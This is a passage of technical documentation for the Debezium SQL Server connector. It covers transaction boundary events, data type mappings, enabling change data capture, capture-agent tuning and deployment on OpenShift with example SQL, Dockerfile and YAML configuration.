messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\nDatabase transactions are represented by a statement block that is enclosed between the `BEGIN` and `END` keywords.\n{prodname} generates transaction boundary events for the `BEGIN` and `END` delimiters in every transaction.\nTransaction boundary events contain the following fields:\n\n`status`:: `BEGIN` or `END`.\n`id`:: String representation of the unique transaction identifier.\n`ts_ms`:: The time of a transaction boundary event (`BEGIN` or `END` event) at the data source.\nIf the data source does not provide {prodname} with the event time, then the field instead represents the time at which {prodname} processes the event.\n`event_count` (for `END` events):: Total number of events emmitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` elements that indicates the number of events that the connector emits for changes that originate from a data collection.\n\n[WARNING]\n====\nThere is no way for {prodname} to reliably identify when a transaction has ended.\nThe transaction `END` marker is thus emitted only after the first event of another transaction arrives.\nThis can lead to the delayed delivery of `END` marker in case of a low-traffic system.\n====\n\nThe following example shows a typical transaction boundary message:\n\n.Example: SQL Server connector transaction boundary event\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"ts_ms\": 1486500577125,\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"ts_ms\": 1486500577691,\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.testDB.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.testDB.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nUnless overridden via the xref:sqlserver-property-topic-transaction[`topic.transaction`] option,\ntransaction events are written to the topic named xref:sqlserver-property-topic-prefix[`_<topic.prefix>_`]`.transaction`.\n\n\/\/Type: concept\n\/\/ModuleID: change-data-event-enrichment\n==== Change data event enrichment\n\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n`id`:: String representation of unique transaction identifier\n`total_order`:: The absolute position of the event among all events generated by the transaction\n`data_collection_order`:: The per-data collection position of the event among all events that were emitted by the transaction\n\nThe following example shows what a typical message looks like:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-sql-server-connectors-map-data-types\n\/\/ Title: How {prodname} SQL Server connectors map data types\n[[sqlserver-data-types]]\n=== Data type mappings\n\nThe {prodname} SQL Server connector represents changes to table row data by producing events that are structured like the table in which the row exists.\nEach event contains fields to represent the column values for the row.\nThe way in which an event represents the column values for an operation depends on the SQL data type of the column.\nIn the event, the connector maps the fields for each SQL Server data type to both a _literal type_ and a _semantic type_.\n\nThe connector can map SQL Server data types to both _literal_ and _semantic_ types.\n\nLiteral type:: Describes how the value is literally represented by using Kafka Connect schema types, namely `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\nSemantic type:: Describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\nIf the default data type conversions do not meet your needs, you can {link-prefix}:{link-custom-converters}#custom-converters[create a custom converter] for the connector.\n\nifdef::product[]\n\nFor more information about data type mappings, see the following sections:\n\n* xref:sql-server-basic-values[]\n* xref:sql-server-temporal-values[]\n* xref:sql-server-decimal-values[]\n* xref:sql-server-timestamp-values[]\n\nendif::product[]\n\n[id=\"sql-server-basic-values\"]\n==== Basic types\n\nThe following table shows how the connector maps basic SQL Server data types.\n\n.Data type mappings used by the SQL Server connector\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|SQL Server data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BIT`\n|`BOOLEAN`\n|n\/a\n\n|`TINYINT`\n|`INT16`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`INT`\n|`INT32`\n|n\/a\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`FLOAT[(N)]`\n|`FLOAT64`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`TEXT`\n|`STRING`\n|n\/a\n\n|`NCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`NVARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`NTEXT`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nContains the string representation of an XML document\n\n|`DATETIMEOFFSET[(P)]`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp` +\n +\nA string representation of a timestamp with timezone information, where the timezone is GMT\n\n|===\n\nOther data type mappings are described in the following sections.\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema.\nChange messages will contain the field's default value\n(unless an explicit column value had been given), so there should rarely be the need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value helps though with satisfying the compatibility rules when xref:{link-avro-serialization}[using Avro] as serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[sql-server-temporal-values]]\n==== Temporal values\n\nOther than SQL Server's `DATETIMEOFFSET` data type (which contain time zone information), the other temporal types depend on the value of the `time.precision.mode` configuration property. When the `time.precision.mode` configuration property is set to `adaptive` (the default), then the connector will determine the literal type and semantic type for the temporal types based on the column's data type definition so that events _exactly_ represent the values in the database:\n\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|SQL Server data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIME(7)`\n|`INT64`\n|`io.debezium.time.NanoTime` +\n +\nRepresents the number of nanoseconds past midnight, and does not include timezone information.\n\n|`DATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2(7)`\n|`INT64`\n|`io.debezium.time.NanoTimestamp` +\n +\nRepresents the number of nanoseconds past the epoch, and does not include timezone information.\n\n|===\n\nWhen the `time.precision.mode` configuration property is set to `connect`, then the connector will use the predefined Kafka Connect logical types. This may be useful when consumers only know about the built-in Kafka Connect logical types and are unable to handle variable-precision time values. On the other hand, since SQL Server supports tenth of microsecond precision, the events generated by a connector with the `connect` time precision mode will *result in a loss of precision* when the database column has a _fractional second precision_ value greater than 3:\n\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|SQL Server data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. SQL Server allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` > 3.\n\n|`DATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. SQL Server allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` > 3.\n\n|===\n\n[[sql-server-timestamp-values]]\n===== Timestamp values\n\nThe `DATETIME`, `SMALLDATETIME` and `DATETIME2` types represent a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC.\nSo for instance the `DATETIME2` value \"2018-06-20 15:13:16.945104\" is represented by a `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\".\n\nNote that the timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\n[id=\"sql-server-decimal-values\"]\n==== Decimal values\n\n{prodname} connectors handle decimals according to the setting of the xref:{link-sqlserver-connector}#sqlserver-property-decimal-handling-mode[`decimal.handling.mode` connector configuration property].\n\ndecimal.handling.mode=precise::\n+\n.Mappings when `decimal.handling.mode=precise`\n[cols=\"30%a,15%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|SQL Server type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(P[,S])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`DECIMAL[(P[,S])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`SMALLMONEY`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`MONEY`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|===\n\ndecimal.handling.mode=double::\n+\n.Mappings when `decimal.handling.mode=double`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|SQL Server type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`SMALLMONEY[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`MONEY[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|===\n\ndecimal.handling.mode=string::\n+\n.Mappings when `decimal.handling.mode=string`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|SQL Server type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`SMALLMONEY[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`MONEY[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-sql-server-for-use-with-the-debezium-sql-server-connector\n\/\/Title: Setting up SQL Server to run a {prodname} connector\n[[setting-up-sqlserver]]\n== Setting up SQL Server\n\nFor {prodname} to capture change events from SQL Server tables, a SQL Server administrator with the necessary privileges must first run a query to enable CDC on the database.\nThe administrator must then enable CDC for each table that you want Debezium to capture.\n\n[NOTE]\n====\nBy default, JDBC connections to Microsoft SQL Server are protected by SSL encryption.\nIf SSL is not enabled for a SQL Server database, or if you want to connect to the database without using SSL, you can disable SSL by setting the value of the `database.encrypt` property in connector configuration to `false`.\n====\n\nifdef::product[]\n\nFor details about setting up SQL Server for use with the {prodname} connector, see the following sections:\n\n* xref:enabling-cdc-on-the-sql-server-database[]\n* xref:enabling-cdc-on-a-sql-server-table[]\n* xref:verifying-debezium-connector-access-to-the-cdc-table[]\n* xref:debezium-sql-server-connector-on-azure[]\n* xref:effect-of-sql-server-capture-job-agent-configuration-on-server-load-and-latency[]\n* xref:sql-server-capture-job-agent-configuration-parameters[]\n\nendif::product[]\n\nAfter CDC is applied, it captures all of the `INSERT`, `UPDATE`, and `DELETE` operations that are committed to the tables for which CDD is enabled.\nThe {prodname} connector can then capture these events and emit them to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-cdc-on-the-sql-server-database\n=== Enabling CDC on the SQL Server database\n\nBefore you can enable CDC for a table, you must enable it for the SQL Server database.\nA SQL Server administrator enables CDC by running a system stored procedure.\nSystem stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\n\n.Prerequisites\n* You are a member of the _sysadmin_ fixed server role for the SQL Server.\n* You are a db_owner of the database.\n* The SQL Server Agent is running.\n\nNOTE: The SQL Server CDC feature processes changes that occur in user-created tables only. You cannot enable CDC on the SQL Server `master` database.\n\n.Procedure\n\n. From the *View* menu in SQL Server Management Studio, click *Template Explorer*.\n. In the *Template Browser*, expand *SQL Server Templates*.\n. Expand *Change Data Capture > Configuration* and then click *Enable Database for CDC*.\n. In the template, replace the database name in the `USE` statement with the name of the database that you want to enable for CDC.\n. Run the stored procedure `sys.sp_cdc_enable_db` to enable the database for CDC.\n+\nAfter the database is enabled for CDC, a schema with the name `cdc` is created, along with a CDC user, metadata tables, and other system objects.\n+\nThe following example shows how to enable CDC for the database `MyDB`:\n+\n.Example: Enabling a SQL Server database for the CDC template\n[source,sql]\n----\nUSE MyDB\nGO\nEXEC sys.sp_cdc_enable_db\nGO\n----\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-cdc-on-a-sql-server-table\n=== Enabling CDC on a SQL Server table\n\nA SQL Server administrator must enable change data capture on the source tables that you want to Debezium to capture.\nThe database must already be enabled for CDC.\nTo enable CDC on a table, a SQL Server administrator runs the stored procedure `sys.sp_cdc_enable_table` for the table.\nThe stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\nSQL Server CDC must be enabled for every table that you want to capture.\n\n.Prerequisites\n* CDC is enabled on the SQL Server database.\n* The SQL Server Agent is running.\n* You are a member of the `db_owner` fixed database role for the database.\n\n.Procedure\n. From the *View* menu in SQL Server Management Studio, click *Template Explorer*.\n. In the *Template Browser*, expand *SQL Server Templates*.\n. Expand *Change Data Capture > Configuration*, and then click *Enable Table Specifying Filegroup Option*.\n. In the template, replace the table name in the `USE` statement with the name of the table that you want to capture.\n. Run the stored procedure `sys.sp_cdc_enable_table`.\n+\nThe following example shows how to enable CDC for the table `MyTable`:\n+\n.Example: Enabling CDC for a SQL Server table\n[source,sql]\n----\nUSE MyDB\nGO\n\nEXEC sys.sp_cdc_enable_table\n@source_schema = N'dbo',\n@source_name = N'MyTable', \/\/<.>\n@role_name = N'MyRole', \/\/<.>\n@filegroup_name = N'MyDB_CT',\/\/<.>\n@supports_net_changes = 0\nGO\n----\n<.> Specifies the name of the table that you want to capture.\n<.> Specifies a role `MyRole` to which you can add users to whom you want to grant `SELECT` permission on the captured columns of the source table.\nUsers in the `sysadmin` or `db_owner` role also have access to the specified change tables. Set the value of `@role_name` to `NULL`, to allow only members in the `sysadmin` or `db_owner` to have full access to captured information.\n<.> Specifies the `filegroup` where SQL Server places the change table for the captured table.\nThe named `filegroup` must already exist.\nIt is best not to locate change tables in the same `filegroup` that you use for source tables.\n\n\n\/\/ Type: procedure\n\/\/ ModuleID: verifying-debezium-connector-access-to-the-cdc-table\n=== Verifying that the user has access to the CDC table\n\nA SQL Server administrator can run a system stored procedure to query a database or table to retrieve its CDC configuration information.\nThe stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\n\n.Prerequisites\n* You have `SELECT` permission on all of the captured columns of the capture instance.\nMembers of the `db_owner` database role can view information for all of the defined capture instances.\n* You have membership in any gating roles that are defined for the table information that the query includes.\n\n.Procedure\n\n. From the *View* menu in SQL Server Management Studio, click *Object Explorer*.\n. From the Object Explorer, expand *Databases*, and then expand your database object, for example, *MyDB*.\n. Expand *Programmability > Stored Procedures > System Stored Procedures*.\n. Run the `sys.sp_cdc_help_change_data_capture` stored procedure to query the table.\n+\nQueries should not return empty results.\n+\nThe following example runs the stored procedure `sys.sp_cdc_help_change_data_capture` on the database `MyDB`:\n+\n.Example: Querying a table for CDC configuration information\n[source, sql]\n----\nUSE MyDB;\nGO\nEXEC sys.sp_cdc_help_change_data_capture\nGO\n----\n+\nThe query returns configuration information for each table in the database that is enabled for CDC and that contains change data that the caller is authorized to access.\nIf the result is empty, verify that the user has privileges to access both the capture instance and the CDC tables.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-sql-server-connector-on-azure\n[[sqlserver-on-azure]]\n=== SQL Server on Azure\n\nThe {prodname} SQL Server connector can be used with SQL Server on Azure.\nRefer to https:\/\/docs.microsoft.com\/en-us\/samples\/azure-samples\/azure-sql-db-change-stream-debezium\/azure-sql-db-change-stream-debezium\/[this example] for configuring CDC for SQL Server on Azure and using it with {prodname}.\n\nifdef::community[]\n\n[[sqlserver-always-on-replica]]\n=== SQL Server Always On\n\nThe SQL Server connector can capture changes from an Always On read-only replica.\n\n.Prerequisites\n* Change data capture is configured and enabled on the primary node.\nSQL Server does not support CDC directly on replicas.\n* The configuration option `database.applicationIntent` is set to `ReadOnly`.\nThis is required by SQL Server.\nWhen {prodname} detects this configuration option, it responds by taking the following actions:\n\n** Sets `snapshot.isolation.mode` to `snapshot`, which is the only one transaction isolation mode supported for read-only replicas.\n** Commits the (read-only) transaction in every execution of the streaming query loop, which is necessary to get the latest view of CDC data.\n\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: effect-of-sql-server-capture-job-agent-configuration-on-server-load-and-latency\n=== Effect of SQL Server capture job agent configuration on server load and latency\n\nWhen a database administrator enables change data capture for a source table, the capture job agent begins to run.\nThe agent reads new change event records from the transaction log and replicates the event records to a change data table.\nBetween the time that a change is committed in the source table, and the time that the change appears in the corresponding change table, there is always a small latency interval.\nThis latency interval represents a gap between when changes occur in the source table and when they become available for {prodname} to stream to Apache Kafka.\n\nIdeally, for applications that must respond quickly to changes in data, you want to maintain close synchronization between the source and change tables.\nYou might imagine that running the capture agent to continuously process change events as rapidly as possible might result in increased throughput and reduced latency --\npopulating change tables with new event records as soon as possible after the events occur, in near real time.\nHowever, this is not necessarily the case.\nThere is a performance penalty to pay in the pursuit of more immediate synchronization.\nEach time that the capture job agent queries the database for new event records, it increases the CPU load on the database host.\nThe additional load on the server can have a negative effect on overall database performance, and potentially reduce transaction efficiency, especially during times of peak database use.\n\nIt's important to monitor database metrics so that you know if the database reaches the point where the server can no longer support the capture agent's level of activity.\nIf you notice performance problems, there are SQL Server capture agent settings that you can modify to help balance the overall CPU load on the database host with a tolerable degree of latency.\n\n\/\/ Type: reference\n\/\/ ModuleID: sql-server-capture-job-agent-configuration-parameters\n=== SQL Server capture job agent configuration parameters\n\nOn SQL Server, parameters that control the behavior of the capture job agent are defined in the SQL Server table link:https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/system-tables\/dbo-cdc-jobs-transact-sql?view=latest[`msdb.dbo.cdc_jobs`].\nIf you experience performance issues while running the capture job agent, adjust capture jobs settings to reduce CPU load by running the link:https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/system-stored-procedures\/sys-sp-cdc-change-job-transact-sql?view=latest[`sys.sp_cdc_change_job`] stored procedure and supplying new values.\n\n[NOTE]\n====\nSpecific guidance about how to configure SQL Server capture job agent parameters is beyond the scope of this documentation.\n====\n\nThe following parameters are the most significant for modifying capture agent behavior for use with the {prodname} SQL Server connector:\n\n`pollinginterval`::\n* Specifies the number of seconds that the capture agent waits between log scan cycles.\n* A higher value reduces the load on the database host and increases latency.\n* A value of `0` specifies no wait between scans.\n* The default value is `5`.\n\n`maxtrans`::\n* Specifies the maximum number of transactions to process during each log scan cycle.\nAfter the capture job processes the specified number of transactions, it pauses for the length of time that the `pollinginterval` specifies before the next scan begins.\n* A lower value reduces the load on the database host and increases latency.\n* The default value is `500`.\n\n`maxscans`::\n* Specifies a limit on the number of scan cycles that the capture job can attempt in capturing the full contents of the database transaction log.\nIf the `continuous` parameter is set to `1`, the job pauses for the length of time that the `pollinginterval` specifies before it resumes scanning.\n* A lower values reduces the load on the database host and increases latency.\n* The default value is `10`.\n\n.Additional resources\n* For more information about capture agent parameters, see the SQL Server documentation.\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-sql-server-connectors\n\/\/ Title: Deployment of {prodname} SQL Server connectors\n[[sqlserver-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\nTo deploy a {prodname} SQL Server connector, you install the {prodname} SQL Server connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect.\n\n.Prerequisites\n* link:https:\/\/zookeeper.apache.org\/[Apache ZooKeeper], link:http:\/\/kafka.apache.org\/[Apache Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* SQL Server is installed, is xref:{link-sqlserver-connector}#setting-up-sqlserver[configured for CDC], and is ready to be used with the {prodname} connector.\n\n.Procedure\n. Download the {prodname} https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-sqlserver\/{debezium-version}\/debezium-connector-sqlserver-{debezium-version}-plugin.tar.gz[SQL Server connector plug-in archive]\n. Extract the files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. xref:{link-sqlserver-connector}#sqlserver-example-configuration[Configure the connector] and xref:{link-sqlserver-connector}#sqlserver-adding-connector-configuration[add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s container images] for \u00c5pache ZooKeeper, Apache Kafka, and Kafka Connect.\nYou can pull the official link:https:\/\/hub.docker.com\/_\/microsoft-mssql-server[container images for Microsoft SQL Server on Linux] from Docker Hub.\n\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nYou can use either of the following methods to deploy a {prodname} SQL Server connector:\n\n* xref:openshift-streams-sqlserver-connector-deployment[Use {StreamsName} to automatically create an image that includes the connector plug-in].\n+\nThis is the preferred method.\n* xref:deploying-debezium-sqlserver-connectors[Build a custom Kafka Connect container image from a Dockerfile].\n\n.Additional resources\n\n* xref:descriptions-of-debezium-sqlserver-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"openshift-streams-sqlserver-connector-deployment\"]\n=== SQL Server connector deployment using {StreamsName}\n\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-streams-deployment.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"using-streams-to-deploy-debezium-sqlserver-connectors\"]\n=== Using {StreamsName} to deploy a {prodname} SQL Server connector\ninclude::{partialsdir}\/modules\/all-connectors\/proc-using-streams-to-deploy-a-debezium-connector.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n\/\/ ModuleID: deploying-debezium-sqlserver-connectors\n[[sql-server-deploying-a-connector]]\n=== Deploying a {prodname} SQL Server connector by building a custom Kafka Connect container image from a Dockerfile\n\nTo deploy a {prodname} SQL Server connector, you must build a custom Kafka Connect container image that contains the {prodname} connector archive, and then push this container image to a container registry.\nYou then need to create the following custom resources (CRs):\n\n* A `KafkaConnect` CR that defines your Kafka Connect instance.\n The `image` property in the CR specifies the name of the container image that you create to run your {prodname} connector.\n You apply this CR to the OpenShift instance where link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat {StreamsName}] is deployed.\n {StreamsName} offers operators and images that bring Apache Kafka to OpenShift.\n\n* A `KafkaConnector` CR that defines your {prodname} SQL Server connector.\n Apply this CR to the same OpenShift instance where you apply the `KafkaConnect` CR.\n\n.Prerequisites\n\n* SQL Server is running and you completed the steps to {LinkDebeziumUserGuide}#setting-up-sql-server-for-use-with-the-debezium-sql-server-connector[set up SQL Server to work with a {prodname} connector].\n\n* {StreamsName} is deployed on OpenShift and is running Apache Kafka and Kafka Connect.\n For more information, see link:{LinkDeployStreamsOpenShift}[{NameDeployStreamsOpenShift}]\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your Debezium connector.\n\n.Procedure\n\n. Create the {prodname} SQL Server container for Kafka Connect:\n\n.. Create a Dockerfile that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following command:\n+\n[source,shell,subs=\"+attributes,+quotes\"]\n----\ncat <<EOF >debezium-container-for-sqlserver.yaml \/\/ <1>\nFROM {DockerKafkaConnect}\nUSER root:root\nRUN mkdir -p \/opt\/kafka\/plugins\/debezium \/\/ <2>\nRUN curl -O {red-hat-maven-repository}debezium\/debezium-connector-{connector-file}\/{debezium-version}-redhat-__<build_number>__\/debezium-connector-{connector-file}-{debezium-version}-redhat-__<build_number>__-plugin.zip\nUSER 1001\nEOF\n----\n<1> You can specify any file name that you want.\n<2> Specifies the path to your Kafka Connect plug-ins directory. If your Kafka Connect plug-ins directory is in a different location, replace this path with the actual path of your directory.\n+\nThe command creates a Dockerfile with the name `debezium-container-for-sqlserver.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-sqlserver.yaml` Docker file that you created in the previous step.\nFrom the directory that contains the file, open a terminal window and enter one of the following commands:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-sqlserver:latest .\n----\n+\n[source,shell,options=\"nowrap\"]\n----\ndocker build -t debezium-container-for-sqlserver:latest .\n----\nThe preceding commands build a container image with the name `debezium-container-for-sqlserver`.\n\n.. Push your custom image to a container registry, such as quay.io or an internal container registry.\nThe container registry must be available to the OpenShift instance where you want to deploy the image.\nEnter one of the following commands:\n+\n[source,shell,subs=\"+quotes\"]\n----\npodman push _<myregistry.io>_\/debezium-container-for-sqlserver:latest\n----\n+\n[source,shell,subs=\"+quotes\"]\n----\ndocker push _<myregistry.io>_\/debezium-container-for-sqlserver:latest\n----\n\n.. Create a new {prodname} SQL Server KafkaConnect custom resource (CR).\nFor example, create a KafkaConnect CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n #...\n image: debezium-container-for-sqlserver \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that KafkaConnector resources are used to configure connectors in this Kafka Connect cluster.\n<2> `spec.image` specifies the name of the image that you created to run your Debezium connector.\nThis property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator\n\n.. Apply the `KafkaConnect` CR to the OpenShift Kafka Connect environment by entering the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThe command adds a Kafka Connect instance that specifies the name of the image that you created to run your {prodname} connector.\n\n. Create a `KafkaConnector` custom resource that configures your {prodname} SQL Server connector instance.\n+\nYou configure a {prodname} SQL Server connector in a `.yaml` file that specifies the configuration properties for the connector.\nThe connector configuration might instruct {prodname} to produce events for a subset of the schemas and tables, or it might set properties so that {prodname} ignores, masks, or truncates values in specified columns that are sensitive, too large, or not needed.\n+\nThe following example configures a {prodname} connector that connects to a SQL server host, `192.168.99.100`, on port `1433`.\nThis host has a database named `testDB`, a table with the name `customers`, and `fulfillment` is the server's logical name.\n+\n.SQL Server `fulfillment-connector.yaml`\n[source,yaml,subs=\"+attributes\",options=\"nowrap\"]\n----\napiVersion: {KafkaConnectorApiVersion}\nkind: KafkaConnector\nmetadata:\n name: fulfillment-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: 'true'\nspec:\n class: io.debezium.connector.sqlserver.SqlServerConnector \/\/ <2>\n config:\n database.hostname: 192.168.99.100 \/\/ <3>\n database.port: 1433 \/\/ <4>\n database.user: debezium \/\/ <5>\n database.password: dbz \/\/ <6>\n database.names: testDB1,testDB2 \/\/ <7>\n topic.prefix: fullfullment \/\/ <8>\n database.include.list: dbo.customers \/\/ <9>\n schema.history.internal.kafka.bootstrap.servers: my-cluster-kafka-bootstrap:9092 \/\/ <10>\n schema.history.internal.kafka.topic: schemahistory.fullfillment \/\/ <11>\n database.ssl.truststore: path\/to\/trust-store \/\/ <12>\n database.ssl.truststore.password: password-for-trust-store <13>\n----\n+\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of our connector when we register it with a Kafka Connect service.\n\n|2\n|The name of this SQL Server connector class.\n\n|3\n|The address of the SQL Server instance.\n\n|4\n|The port number of the SQL Server instance.\n\n|5\n|The name of the SQL Server user.\n\n|6\n|The password for the SQL Server user.\n\n|7\n|The name of the database to capture changes from.\n\n|8\n|The topic prefix for the SQL Server instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the 